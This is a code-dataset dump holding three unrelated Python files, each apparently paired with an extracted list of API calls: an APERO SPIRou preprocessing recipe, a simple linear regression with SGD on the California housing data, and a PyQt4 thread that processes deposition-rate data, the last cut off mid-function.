6698), False, 'from abagen import datasets, io, process, utils\n'), ((7130, 7161), 'numpy.where', 'np.where', (['(labelled_samples == 0)'], {}), '(labelled_samples == 0)\n', (7138, 7161), True, 'import numpy as np\n'), ((8858, 8893), 'numpy.setdiff1d', 'np.setdiff1d', (['labels', 'sample_labels'], {}), '(labels, sample_labels)\n', (8870, 8893), True, 'import numpy as np\n'), ((16942, 16983), 'abagen.utils.check_atlas_info', 'utils.check_atlas_info', (['atlas', 'atlas_info'], {}), '(atlas, atlas_info)\n', (16964, 16983), False, 'from abagen import datasets, io, process, utils\n'), ((17250, 17295), 'abagen.utils.get_centroids', 'utils.get_centroids', (['atlas'], {'labels': 'all_labels'}), '(atlas, labels=all_labels)\n', (17269, 17295), False, 'from abagen import datasets, io, process, utils\n'), ((17558, 17600), 'abagen.process.reannotate_probes', 'process.reannotate_probes', (['files.probes[0]'], {}), '(files.probes[0])\n', (17583, 17600), False, 'from abagen import datasets, io, process, utils\n'), ((17628, 17659), 'abagen.io.read_probes', 'io.read_probes', (['files.probes[0]'], {}), '(files.probes[0])\n', (17642, 17659), False, 'from abagen import datasets, io, process, utils\n'), ((18195, 18299), 'abagen.process.drop_mismatch_samples', 'process.drop_mismatch_samples', (['files.annotation[subj]', 'files.ontology[subj]'], {'corrected': 'corrected_mni'}), '(files.annotation[subj], files.ontology[subj],\n corrected=corrected_mni)\n', (18224, 18299), False, 'from abagen import datasets, io, process, utils\n'), ((18490, 18532), 'abagen.io.read_microarray', 'io.read_microarray', (['files.microarray[subj]'], {}), '(files.microarray[subj])\n', (18508, 18532), False, 'from abagen import datasets, io, process, utils\n'), ((19106, 19150), 'numpy.unique', 'np.unique', (['sample_labels'], {'return_counts': '(True)'}), '(sample_labels, return_counts=True)\n', (19115, 19150), True, 'import numpy as np\n'), ((20609, 20640), 'abagen.process.normalize_expression', 'process.normalize_expression', (['e'], {}), '(e)\n', (20637, 20640), False, 'from abagen import datasets, io, process, utils\n'), ((20709, 20753), 'abagen.process.aggregate_donors', 'process.aggregate_donors', (['expression', 'metric'], {}), '(expression, metric)\n', (20733, 20753), False, 'from abagen import datasets, io, process, utils\n'), ((1553, 1574), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], {}), '(atlas)\n', (1567, 1574), False, 'from nilearn._utils import check_niimg_3d\n'), ((4221, 4268), 'numpy.all', 'np.all', (['(sample_info.values == atlas_info.values)'], {}), '(sample_info.values == atlas_info.values)\n', (4227, 4268), True, 'import numpy as np\n'), ((18034, 18060), 'numpy.append', 'np.append', (['[0]', 'all_labels'], {}), '([0], all_labels)\n', (18043, 18060), True, 'import numpy as np\n'), ((19459, 19530), 'abagen.utils.xyz_to_ijk', 'utils.xyz_to_ijk', (["annotation[['mni_x', 'mni_y', 'mni_z']]", 'atlas.affine'], {}), "(annotation[['mni_x', 'mni_y', 'mni_z']], atlas.affine)\n", (19475, 19530), False, 'from abagen import datasets, io, process, utils\n'), ((19644, 19710), 'abagen.utils.closest_centroid', 'utils.closest_centroid', (['coords', 'centroids[empty]'], {'return_dist': '(True)'}), '(coords, centroids[empty], return_dist=True)\n', (19666, 19710), False, 'from abagen import datasets, io, process, utils\n'), ((19894, 19924), 'pandas.Series', 'pd.Series', (['empty'], {'name': '"""label"""'}), "(empty, name='label')\n", (19903, 19924), True, 'import pandas as pd\n'), ((8988, 9020), 'pandas.Series', 'pd.Series', (['missing'], {'name': '"""label"""'}), "(missing, name='label')\n", (8997, 9020), True, 'import pandas as pd\n'), ((19590, 19615), 'numpy.in1d', 'np.in1d', (['all_labels', 'labs'], {}), '(all_labels, labs)\n', (19597, 19615), True, 'import numpy as np\n'), ((1842, 1863), 'scipy.spatial.distance.cdist', 'cdist', (['sample', 'coords'], {}), '(sample, coords)\n', (1847, 1863), False, 'from scipy.spatial.distance import cdist\n'), ((19975, 19988), 'numpy.diag', 'np.diag', (['dist'], {}), '(dist)\n', (19982, 19988), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# CODE DESCRIPTION HERE
Created on 2019-03-05 16:38
@author: ncook
Version 0.0.1
"""
import numpy as np
import os
from apero import core
from apero import lang
from apero.core import constants
from apero.science import preprocessing as pp
from apero.io import drs_image
from apero.io import drs_fits
from apero.core.instruments.spirou import file_definitions
# =============================================================================
# Define variables
# =============================================================================
__NAME__ = 'cal_preprocess_spirou.py'
__INSTRUMENT__ = 'SPIROU'
# Get constants
Constants = constants.load(__INSTRUMENT__)
# Get version and author
__version__ = Constants['DRS_VERSION']
__author__ = Constants['AUTHORS']
__date__ = Constants['DRS_DATE']
__release__ = Constants['DRS_RELEASE']
# Get Logging function
WLOG = core.wlog
# Get the text types
TextEntry = lang.drs_text.TextEntry
# Raw prefix
RAW_PREFIX = file_definitions.raw_prefix
# =============================================================================
# Define functions
# =============================================================================
# All recipe code goes in _main
# Only change the following from here:
# 1) function calls (i.e. main(arg1, arg2, **kwargs)
# 2) fkwargs (i.e. fkwargs=dict(arg1=arg1, arg2=arg2, **kwargs)
# 3) config_main outputs value (i.e. None, pp, reduced)
# Everything else is controlled from recipe_definition
def main(directory=None, files=None, **kwargs):
"""
Main function for cal_preprocess_spirou.py
:param directory: string, the night name sub-directory
:param files: list of strings or string, the list of files to process
:param kwargs: any additional keywords
:type directory: str
:type files: list[str]
:keyword debug: int, debug level (0 for None)
:returns: dictionary of the local space
:rtype: dict
"""
# assign function calls (must add positional)
fkwargs = dict(directory=directory, files=files, **kwargs)
# ----------------------------------------------------------------------
# deal with command line inputs / function call inputs
recipe, params = core.setup(__NAME__, __INSTRUMENT__, fkwargs)
# solid debug mode option
if kwargs.get('DEBUG0000', False):
return recipe, params
# ----------------------------------------------------------------------
# run main bulk of code (catching all errors)
llmain, success = core.run(__main__, recipe, params)
# ----------------------------------------------------------------------
# End Message
# ----------------------------------------------------------------------
return core.end_main(params, llmain, recipe, success, outputs='None')
def __main__(recipe, params):
# ----------------------------------------------------------------------
# Main Code
# ----------------------------------------------------------------------
# Get hot pixels for corruption check
hotpixels = pp.get_hot_pixels(params)
# get skip parmaeter
skip = params['SKIP_DONE_PP']
# ----------------------------------------------------------------------
# Loop around input files
# ----------------------------------------------------------------------
# get files
infiles = params['INPUTS']['FILES'][1]
# Number of files
num_files = len(params['INPUTS']['FILES'][1])
# storage for output files
output_names = []
# loop around number of files
for it in range(num_files):
# ------------------------------------------------------------------
# add level to recipe log
log1 = recipe.log.add_level(params, 'num', it)
# ------------------------------------------------------------------
# print file iteration progress
core.file_processing_update(params, it, num_files)
# ge this iterations file
file_instance = infiles[it]
# ------------------------------------------------------------------
# Fix the spirou header
# ------------------------------------------------------------------
# certain keys may not be in some spirou files
file_instance = drs_fits.fix_header(params, recipe, file_instance)
# ------------------------------------------------------------------
# identification of file drs type
# ------------------------------------------------------------------
# identify this iterations file type
cond, infile = pp.drs_infile_id(params, recipe, file_instance)
# ------------------------------------------------------------------
# if it wasn't found skip this file, if it was print a message
if cond:
eargs = [infile.name]
WLOG(params, 'info', TextEntry('40-010-00001', args=eargs))
else:
eargs = [infile.filename]
WLOG(params, 'info', TextEntry('40-010-00002', args=eargs))
continue
# get data from file instance
image = np.array(infile.data)
# ------------------------------------------------------------------
# Get out file and check skip
# ------------------------------------------------------------------
# get the output drs file
oargs = [params, recipe, infile, recipe.outputs['PP_FILE'], RAW_PREFIX]
found, outfile = pp.drs_outfile_id(*oargs)
# construct out filename
outfile.construct_filename(params, infile=infile)
# if we didn't find the output file we should log this error
if not found:
eargs = [outfile.name]
WLOG(params, 'error', TextEntry('00-010-00003', args=eargs))
if skip:
if os.path.exists(outfile.filename):
wargs = [infile.filename]
WLOG(params, 'info', TextEntry('40-010-00012', args=wargs))
continue
# ----------------------------------------------------------------------
# Check for pixel shift and/or corrupted files
# ----------------------------------------------------------------------
# storage
snr_hotpix, rms_list = [], []
# do this iteratively as if there is a shift need to re-workout QC
for iteration in range(2):
# get pass condition
cout = pp.test_for_corrupt_files(params, image, hotpixels)
snr_hotpix, rms_list = cout[0], cout[1]
shiftdx, shiftdy = cout[2], cout[3]
# use dx/dy to shift the image back to where the engineering flat
# is located
if shiftdx != 0 or shiftdy != 0:
# log process
wmsg = TextEntry('40-010-00013', args=[shiftdx, shiftdy])
WLOG(params, '', wmsg)
# shift image
image = np.roll(image, [shiftdy], axis=0)
image = np.roll(image, [shiftdx], axis=1)
# work out QC here
qargs = [snr_hotpix, infile, rms_list]
qc_params, passed = pp.quality_control(params, *qargs, log=False)
# if passed break
if passed:
break
# ------------------------------------------------------------------
# Quality control to check for corrupt files
# ------------------------------------------------------------------
# re-calculate qc
qargs = [snr_hotpix, infile, rms_list]
qc_params, passed = pp.quality_control(params, *qargs, log=True)
# update recipe log
log1.add_qc(params, qc_params, passed)
if not passed:
# end log here
log1.end(params)
# go to next iteration
continue
# ------------------------------------------------------------------
# correct image
# ------------------------------------------------------------------
# correct for the top and bottom reference pixels
WLOG(params, '', TextEntry('40-010-00003'))
image = pp.correct_top_bottom(params, image)
# correct by a median filter from the dark amplifiers
WLOG(params, '', TextEntry('40-010-00004'))
image = pp.median_filter_dark_amps(params, image)
# correct for the 1/f noise
WLOG(params, '', TextEntry('40-010-00005'))
image = pp.median_one_over_f_noise(params, image)
# ------------------------------------------------------------------
# calculate mid observation time
# ------------------------------------------------------------------
mout = drs_fits.get_mid_obs_time(params, infile.header)
mid_obs_time, mid_obs_method = mout
# ------------------------------------------------------------------
# rotate image
# ------------------------------------------------------------------
# rotation to match HARPS orientation (expected by DRS)
image = drs_image.rotate_image(image, params['RAW_TO_PP_ROTATION'])
# ------------------------------------------------------------------
# Save rotated image
# ------------------------------------------------------------------
# define header keys for output file
# copy keys from input file
outfile.copy_original_keys(infile)
# add version
outfile.add_hkey('KW_PPVERSION', value=params['DRS_VERSION'])
# add dates
outfile.add_hkey('KW_DRS_DATE', value=params['DRS_DATE'])
outfile.add_hkey('KW_DRS_DATE_NOW', value=params['DATE_NOW'])
# add process id
outfile.add_hkey('KW_PID', value=params['PID'])
# add input filename
outfile.add_hkey_1d('KW_INFILE1', values=[infile.basename],
dim1name='infile')
# add qc parameters
outfile.add_qckeys(qc_params)
# add dprtype
outfile.add_hkey('KW_DPRTYPE', value=outfile.name)
# add the shift that was used to correct the image
outfile.add_hkey('KW_PPSHIFTX', value=shiftdx)
outfile.add_hkey('KW_PPSHIFTY', value=shiftdy)
# add mid observation time
outfile.add_hkey('KW_MID_OBS_TIME', value=mid_obs_time.mjd)
outfile.add_hkey('KW_MID_OBSTIME_METHOD', value=mid_obs_method)
# ------------------------------------------------------------------
# copy data
outfile.data = image
# ------------------------------------------------------------------
# log that we are saving rotated image
wargs = [outfile.filename]
WLOG(params, '', TextEntry('40-010-00009', args=wargs))
# ------------------------------------------------------------------
# writefits image to file
outfile.write_file()
# add to output files (for indexing)
recipe.add_output_file(outfile)
# index this file
core.end_main(params, None, recipe, success=True, outputs='pp',
end=False)
# ------------------------------------------------------------------
# append to output storage in p
# ------------------------------------------------------------------
output_names.append(outfile.filename)
# ------------------------------------------------------------------
# update recipe log file
# ------------------------------------------------------------------
log1.end(params)
# ----------------------------------------------------------------------
# End of main code
# ----------------------------------------------------------------------
return core.return_locals(params, dict(locals()))
# =============================================================================
# Start of code
# =============================================================================
if __name__ == "__main__":
# run main with no arguments (get from command line - sys.argv)
ll = main()
# =============================================================================
# End of code
# =============================================================================
|
[
"apero.core.setup",
"apero.science.preprocessing.median_one_over_f_noise",
"apero.science.preprocessing.correct_top_bottom",
"apero.core.run",
"apero.science.preprocessing.quality_control",
"apero.science.preprocessing.get_hot_pixels",
"apero.io.drs_image.rotate_image",
"os.path.exists",
"apero.io.drs_fits.fix_header",
"apero.core.file_processing_update",
"apero.science.preprocessing.median_filter_dark_amps",
"numpy.roll",
"apero.science.preprocessing.drs_infile_id",
"apero.core.constants.load",
"apero.io.drs_fits.get_mid_obs_time",
"apero.science.preprocessing.test_for_corrupt_files",
"apero.science.preprocessing.drs_outfile_id",
"apero.core.end_main",
"numpy.array"
] |
[((686, 716), 'apero.core.constants.load', 'constants.load', (['__INSTRUMENT__'], {}), '(__INSTRUMENT__)\n', (700, 716), False, 'from apero.core import constants\n'), ((2269, 2314), 'apero.core.setup', 'core.setup', (['__NAME__', '__INSTRUMENT__', 'fkwargs'], {}), '(__NAME__, __INSTRUMENT__, fkwargs)\n', (2279, 2314), False, 'from apero import core\n'), ((2563, 2597), 'apero.core.run', 'core.run', (['__main__', 'recipe', 'params'], {}), '(__main__, recipe, params)\n', (2571, 2597), False, 'from apero import core\n'), ((2781, 2843), 'apero.core.end_main', 'core.end_main', (['params', 'llmain', 'recipe', 'success'], {'outputs': '"""None"""'}), "(params, llmain, recipe, success, outputs='None')\n", (2794, 2843), False, 'from apero import core\n'), ((3105, 3130), 'apero.science.preprocessing.get_hot_pixels', 'pp.get_hot_pixels', (['params'], {}), '(params)\n', (3122, 3130), True, 'from apero.science import preprocessing as pp\n'), ((3917, 3967), 'apero.core.file_processing_update', 'core.file_processing_update', (['params', 'it', 'num_files'], {}), '(params, it, num_files)\n', (3944, 3967), False, 'from apero import core\n'), ((4303, 4353), 'apero.io.drs_fits.fix_header', 'drs_fits.fix_header', (['params', 'recipe', 'file_instance'], {}), '(params, recipe, file_instance)\n', (4322, 4353), False, 'from apero.io import drs_fits\n'), ((4618, 4665), 'apero.science.preprocessing.drs_infile_id', 'pp.drs_infile_id', (['params', 'recipe', 'file_instance'], {}), '(params, recipe, file_instance)\n', (4634, 4665), True, 'from apero.science import preprocessing as pp\n'), ((5136, 5157), 'numpy.array', 'np.array', (['infile.data'], {}), '(infile.data)\n', (5144, 5157), True, 'import numpy as np\n'), ((5490, 5515), 'apero.science.preprocessing.drs_outfile_id', 'pp.drs_outfile_id', (['*oargs'], {}), '(*oargs)\n', (5507, 5515), True, 'from apero.science import preprocessing as pp\n'), ((7587, 7631), 'apero.science.preprocessing.quality_control', 'pp.quality_control', (['params', '*qargs'], {'log': '(True)'}), '(params, *qargs, log=True)\n', (7605, 7631), True, 'from apero.science import preprocessing as pp\n'), ((8147, 8183), 'apero.science.preprocessing.correct_top_bottom', 'pp.correct_top_bottom', (['params', 'image'], {}), '(params, image)\n', (8168, 8183), True, 'from apero.science import preprocessing as pp\n'), ((8315, 8356), 'apero.science.preprocessing.median_filter_dark_amps', 'pp.median_filter_dark_amps', (['params', 'image'], {}), '(params, image)\n', (8341, 8356), True, 'from apero.science import preprocessing as pp\n'), ((8462, 8503), 'apero.science.preprocessing.median_one_over_f_noise', 'pp.median_one_over_f_noise', (['params', 'image'], {}), '(params, image)\n', (8488, 8503), True, 'from apero.science import preprocessing as pp\n'), ((8715, 8763), 'apero.io.drs_fits.get_mid_obs_time', 'drs_fits.get_mid_obs_time', (['params', 'infile.header'], {}), '(params, infile.header)\n', (8740, 8763), False, 'from apero.io import drs_fits\n'), ((9066, 9125), 'apero.io.drs_image.rotate_image', 'drs_image.rotate_image', (['image', "params['RAW_TO_PP_ROTATION']"], {}), "(image, params['RAW_TO_PP_ROTATION'])\n", (9088, 9125), False, 'from apero.io import drs_image\n'), ((11006, 11080), 'apero.core.end_main', 'core.end_main', (['params', 'None', 'recipe'], {'success': '(True)', 'outputs': '"""pp"""', 'end': '(False)'}), "(params, None, recipe, success=True, outputs='pp', end=False)\n", (11019, 11080), False, 'from apero import core\n'), ((5838, 5870), 'os.path.exists', 'os.path.exists', (['outfile.filename'], {}), '(outfile.filename)\n', (5852, 5870), False, 'import os\n'), ((6451, 6502), 'apero.science.preprocessing.test_for_corrupt_files', 'pp.test_for_corrupt_files', (['params', 'image', 'hotpixels'], {}), '(params, image, hotpixels)\n', (6476, 6502), True, 'from apero.science import preprocessing as pp\n'), ((7157, 7202), 'apero.science.preprocessing.quality_control', 'pp.quality_control', (['params', '*qargs'], {'log': '(False)'}), '(params, *qargs, log=False)\n', (7175, 7202), True, 'from apero.science import preprocessing as pp\n'), ((6951, 6984), 'numpy.roll', 'np.roll', (['image', '[shiftdy]'], {'axis': '(0)'}), '(image, [shiftdy], axis=0)\n', (6958, 6984), True, 'import numpy as np\n'), ((7009, 7042), 'numpy.roll', 'np.roll', (['image', '[shiftdx]'], {'axis': '(1)'}), '(image, [shiftdx], axis=1)\n', (7016, 7042), True, 'import numpy as np\n')]
|
#%%
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets, linear_model, metrics, preprocessing
from sklearn.model_selection import train_test_split
import itertools
import typing
class LinearRegression():
def __init__(self, n_features, optimiser):
np.random.seed(2)
self.w = np.random.randn(n_features)
self.b = np.random.randn()
self.optimiser = optimiser
def fit(self, X, y):
'''
Fit model to data
'''
losses = []
for epoch in range(self.optimiser.epochs):
y_pred = self.predict(X)
new_w, new_b = self.optimiser.step(self.w, self.b, X, y_pred, y)
self._update_params(new_w, new_b)
losses.append(LinearRegression.mse_loss(y_pred, y))
LinearRegression.plot_loss(losses)
print('Final cost:', losses[-1])
print('Weight values:', self.w)
print('Bias values:', self.b)
def predict(self, X):
'''
Calculate prediction
'''
y_pred = np.dot(X, self.w) + self.b
return y_pred
@staticmethod
def mse_loss(y_pred, y_true):
'''
Calculate mean squared error
'''
m = y_pred.size
errors = y_pred - y_true
mse = 1/m * np.dot(errors.T, errors)
return mse
@staticmethod
def plot_loss(losses):
'''
Plot losses
'''
plt.figure()
plt.ylabel('Cost')
plt.xlabel('Epoch')
plt.plot(losses)
plt.show()
def _update_params(self, w, b):
'''
Update parameters
'''
self.w = w
self.b = b
return w, b
def score(self, y_pred, y_true):
'''
Calculate R2 score
'''
u = np.dot((y_pred - y_true).T, (y_pred - y_true))
y_true_mean = np.full(y_true.shape, np.mean(y_true))
v = np.dot((y_true_mean - y_true).T, (y_true_mean - y_true))
R2 = 1 - u/v
return R2
class SGDOptimiser:
def __init__(self, alpha, epochs):
self.alpha = alpha
self.epochs = epochs
def _calc_deriv(self, X, y_pred, y_true):
'''
Calculate derivate of mean square error(loss) with respect to parameters
'''
m = y_pred.size
errors = y_pred - y_true
dLdw = 2/m * np.sum(X.T * errors).T
print('dLdw',dLdw)
dLdb = 2/m * np.sum(errors)
print('dLdb',dLdb)
return dLdw, dLdb
def step(self, w, b, X, y_pred, y_true):
'''
Calculate updated paramters to decrease mean square error
'''
dLdw, dLdb = self._calc_deriv(X, y_pred, y_true)
new_w = w - self.alpha * dLdw
new_b = b - self.alpha * dLdb
return new_w, new_b
class DataLoader:
def __init__(self, X, y):
idx = np.random.permutation(X.shape[0])
self.X = X[idx]
self.y = y[idx]
def yield_data(self, n):
X_yield = self.X[0:n+1]
y_yield = self.y[0:n+1]
self.X = self.X[n+1:]
self.y = self.y[n+1:]
return X_yield, y_yield
def add_data(self, X_new, y_new):
self.X = np.append(X, X_new)
self.y = np.append(y, y_new)
#%%
np.random.seed(2)
X, y = datasets.fetch_california_housing(return_X_y=True)
scaler = preprocessing.StandardScaler()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)
X_test, X_val, y_test, y_val = train_test_split(X_test, y_test, test_size=0.5)
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)
X_val = scaler.transform(X_val)
np.random.seed(2)
epochs = 1000
a = 0.001
optimiser = SGDOptimiser(alpha=a, epochs=epochs)
model = LinearRegression(optimiser=optimiser, n_features=X_train.shape[1])
model.fit(X_train, y_train)
y_pred = model.predict(X_train)
score = model.score(y_pred,y_train)
print(score)
# %%
# %%
|
[
"numpy.random.seed",
"sklearn.preprocessing.StandardScaler",
"matplotlib.pyplot.plot",
"numpy.random.randn",
"matplotlib.pyplot.show",
"sklearn.model_selection.train_test_split",
"numpy.sum",
"sklearn.datasets.fetch_california_housing",
"numpy.append",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.random.permutation",
"numpy.dot",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel"
] |
[((3275, 3292), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (3289, 3292), True, 'import numpy as np\n'), ((3300, 3350), 'sklearn.datasets.fetch_california_housing', 'datasets.fetch_california_housing', ([], {'return_X_y': '(True)'}), '(return_X_y=True)\n', (3333, 3350), False, 'from sklearn import datasets, linear_model, metrics, preprocessing\n'), ((3360, 3390), 'sklearn.preprocessing.StandardScaler', 'preprocessing.StandardScaler', ([], {}), '()\n', (3388, 3390), False, 'from sklearn import datasets, linear_model, metrics, preprocessing\n'), ((3426, 3463), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.3)'}), '(X, y, test_size=0.3)\n', (3442, 3463), False, 'from sklearn.model_selection import train_test_split\n'), ((3495, 3542), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X_test', 'y_test'], {'test_size': '(0.5)'}), '(X_test, y_test, test_size=0.5)\n', (3511, 3542), False, 'from sklearn.model_selection import train_test_split\n'), ((3650, 3667), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (3664, 3667), True, 'import numpy as np\n'), ((308, 325), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (322, 325), True, 'import numpy as np\n'), ((343, 370), 'numpy.random.randn', 'np.random.randn', (['n_features'], {}), '(n_features)\n', (358, 370), True, 'import numpy as np\n'), ((388, 405), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (403, 405), True, 'import numpy as np\n'), ((1470, 1482), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1480, 1482), True, 'import matplotlib.pyplot as plt\n'), ((1491, 1509), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Cost"""'], {}), "('Cost')\n", (1501, 1509), True, 'import matplotlib.pyplot as plt\n'), ((1518, 1537), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epoch"""'], {}), "('Epoch')\n", (1528, 1537), True, 'import matplotlib.pyplot as plt\n'), ((1546, 1562), 'matplotlib.pyplot.plot', 'plt.plot', (['losses'], {}), '(losses)\n', (1554, 1562), True, 'import matplotlib.pyplot as plt\n'), ((1571, 1581), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1579, 1581), True, 'import matplotlib.pyplot as plt\n'), ((1828, 1872), 'numpy.dot', 'np.dot', (['(y_pred - y_true).T', '(y_pred - y_true)'], {}), '((y_pred - y_true).T, y_pred - y_true)\n', (1834, 1872), True, 'import numpy as np\n'), ((1948, 2002), 'numpy.dot', 'np.dot', (['(y_true_mean - y_true).T', '(y_true_mean - y_true)'], {}), '((y_true_mean - y_true).T, y_true_mean - y_true)\n', (1954, 2002), True, 'import numpy as np\n'), ((2889, 2922), 'numpy.random.permutation', 'np.random.permutation', (['X.shape[0]'], {}), '(X.shape[0])\n', (2910, 2922), True, 'import numpy as np\n'), ((3213, 3232), 'numpy.append', 'np.append', (['X', 'X_new'], {}), '(X, X_new)\n', (3222, 3232), True, 'import numpy as np\n'), ((3250, 3269), 'numpy.append', 'np.append', (['y', 'y_new'], {}), '(y, y_new)\n', (3259, 3269), True, 'import numpy as np\n'), ((1084, 1101), 'numpy.dot', 'np.dot', (['X', 'self.w'], {}), '(X, self.w)\n', (1090, 1101), True, 'import numpy as np\n'), ((1328, 1352), 'numpy.dot', 'np.dot', (['errors.T', 'errors'], {}), '(errors.T, errors)\n', (1334, 1352), True, 'import numpy as np\n'), ((1919, 1934), 'numpy.mean', 'np.mean', (['y_true'], {}), '(y_true)\n', (1926, 1934), True, 'import numpy as np\n'), ((2461, 2475), 'numpy.sum', 'np.sum', (['errors'], {}), '(errors)\n', (2467, 2475), True, 'import numpy as np\n'), ((2390, 2410), 'numpy.sum', 'np.sum', (['(X.T * errors)'], {}), '(X.T * errors)\n', (2396, 2410), True, 'import numpy as np\n')]
|
# <NAME> and <NAME>
# Created: 6/05/2013
# Last Updated: 6/14/2013
# For JCAP
import numpy as np
from PyQt4 import QtCore
from dictionary_helpers import *
import date_helpers
import filename_handler
import datareader
# global dictionary holds all processed (z, x, y, rate) data for the experiment
DEP_DATA = []
zndec = 1
tndec = 0
radius1 = 28.
radius2 = 45.
""" does all of the data processing necessary for deposition plots """
class ProcessorThread(QtCore.QThread):
# transfers new line from reader to MainMenu
lineRead = QtCore.pyqtSignal(list)
# transfers new processed data to deposition graph
newData = QtCore.pyqtSignal(tuple)
srcError = QtCore.pyqtSignal(int)
def __init__(self, parent=None, filename='default.csv'):
super(ProcessorThread, self).__init__()
self.file = filename
self.rowBuffer = []
self.changeZ = False
self.running = True
self.reader = datareader.DataReader(parent=self, filename=self.file)
self.reader.lineRead.connect(self.newLineRead)
def run(self):
self.reader.start()
# initialize DATA_DICT column numbers used for data processing
try:
self.tcolnum = getCol('Src%d Motor Tilt Position' %int(filename_handler.FILE_INFO['Source']))
except IndexError:
self.srcError.emit(int(filename_handler.FILE_INFO['Source']))
self.zcolnum = getCol('Platen Zshift Motor 1 Position')
self.anglecolnum = getCol('Platen Motor Position')
while self.running:
pass
""" called whenever the reader sends a full line """
def newLineRead(self, newRow):
self.lineRead.emit(newRow)
self.processRow(newRow)
""" adds a new row to its own row buffer and processes the
data in the row buffer if the azimuth or z-value of the
instrument has changed """
def processRow(self, row):
if self.rowBuffer == []:
self.rowBuffer += [row]
else:
angle = round(float(row[self.anglecolnum]))
zval = round(float(row[self.zcolnum]), 2)
prevangle = round(float(self.rowBuffer[-1][self.anglecolnum]), 0)
prevz = round(float(self.rowBuffer[-1][self.zcolnum]), 2)
if (angle == prevangle and zval == prevz):
self.rowBuffer += [row]
elif (angle == prevangle):
self.processData(prevz, prevangle, radius1)
self.processData(prevz, prevangle, radius2)
# indicates that center point will need to be
# computed in next round of processing
self.changeZ = True
# reset row buffer
self.rowBuffer = [row]
else:
self.processData(zval, prevangle, radius1)
self.processData(zval, prevangle, radius2)
self.rowBuffer = [row]
""" processes all rates at the same angle and z-value
to produce a single (z, x, y, rate) data point """
def processData(self, z, angle, radius):
global DEP_DATA
rowRange = self.getRowRange()
# only one or two data points indicates a transitional angle
# that can be ignored - Savitzky Golay can be used in the future
if rowRange[1] - rowRange[0] <= 2:
pass
else:
# get only valid rows from buffer
dataArray = self.rowBuffer[rowRange[0]:(rowRange[1]+1)]
# transpose matrix so that each column in the
# spreadsheet becomes a row
dataArrayT = np.array(dataArray).T
timespan = self.getTimeSpan(dataArrayT)
depRates = self.getDepRates(timespan, dataArrayT)
# normalize based on drifting center point
rate0 = self.getXtalRate(3, dataArrayT).mean()
rate = rate0
if radius == radius1:
if angle == 0 or self.changeZ:
# plot center point along with first set
# of data for this z-value
DEP_DATA.append((z, 0.0, 0.0, rate))
self.newData.emit((z, 0.0, 0.0, rate))
self.changeZ = False
x = radius * np.cos(angle * np.pi/180.)
y = radius * np.sin(angle * np.pi/180.)
# rate1 corresponds to Xtal4 Rate
rate = rate0 * depRates[2]/depRates[1]
else:
x = radius * np.cos(angle * np.pi/180. + np.pi)
y = radius * np.sin(angle * np.pi/180. + np.pi)
# rate2 corresponds to Xtal2 Rate
rate = rate0 * depRates[0]/depRates[1]
# store data points for initializing new graph
DEP_DATA.append((z, x, y, rate))
# indicate to exisiting graphs that there is
# new data to display
self.newData.emit((z, x, y, rate))
""" helper function to correct for instrument noise in measuring z-value """
def roundZ(self, zcol):
zrnd=np.round(zcol, decimals=zndec)
for i, zval in enumerate(zrnd):
if zval not in filename_handler.FILE_INFO['Z_mm']:
zrnd[i] = -1
return zrnd
""" helper function to correct for instrument noise in measuring tilt """
def roundT(self, tcol):
trnd=np.round(tcol, decimals=tndec)
for i, tval in enumerate(trnd):
if tval not in filename_handler.FILE_INFO['TiltDeg']:
trnd[i] = -1
return trnd
""" gets range of valid rows in row buffer based on
whether z and t values match experimental parameters """
def getRowRange(self):
data = np.array(self.rowBuffer)
datacols = data.T
zcol = map(float, datacols[self.zcolnum])
tcol = map(float, datacols[self.tcolnum])
inds_useful=np.where((self.roundZ(zcol)>=0)&(self.roundT(tcol)>=0))[0]
# if rowRange is nonzero, send it
if inds_useful.size:
return (inds_useful[0], inds_useful[-1])
# otherwise, send dummy rowRange to processData
return (0, 0)
""" gets time span of valid data set for given angle and z-value """
def getTimeSpan(self, dataArrayT):
datecol = getCol('Date')
timecol = getCol('Time')
datetimeTup = zip(dataArrayT[datecol], dataArrayT[timecol])
startStr = datetimeTup[0][0] + ' ' + datetimeTup[0][1]
endStr = datetimeTup[-1][0] + ' ' + datetimeTup[-1][1]
durationObj = date_helpers.dateObjFloat(endStr) - date_helpers.dateObjFloat(startStr)
return durationObj.total_seconds()
""" helper function to return column of Xtal rates from valid data set """
def getXtalRate(self, ratenum, dataArrayT):
rcolnum = getCol('Xtal%d Rate' % ratenum)
return np.array(map(float, dataArrayT[rcolnum]))
""" helper function to compute all deposition rates
as time-averaged Xtal rates """
def getDepRates(self, timespan, dataArrayT):
depRates = []
for x in range(2,5):
rateData = self.getXtalRate(x, dataArrayT)
rateDiff = rateData[-1] - rateData[0]
depRates += [rateDiff/timespan]
return depRates
""" re-initializes data sets and reader when a new
spreadsheet file is loaded """
def newFile(self, newfile):
global DEP_DATA
DEP_DATA = []
self.rowBuffer = []
if self.reader:
self.reader.end()
self.reader = datareader.DataReader(parent=self, filename=newfile)
self.reader.lineRead.connect(self.newLineRead)
self.reader.start()
# re-initialize DATA_DICT column numbers used for data processing
try:
self.tcolnum = getCol('Src%d Motor Tilt Position' %int(filename_handler.FILE_INFO['Source']))
except IndexError:
self.srcError.emit(int(filename_handler.FILE_INFO['Source']))
self.zcolnum = getCol('Platen Zshift Motor 1 Position')
self.anglecolnum = getCol('Platen Motor Position')
""" empties row buffer and kills reader when experiment has ended """
def onEndExperiment(self):
if self.rowBuffer:
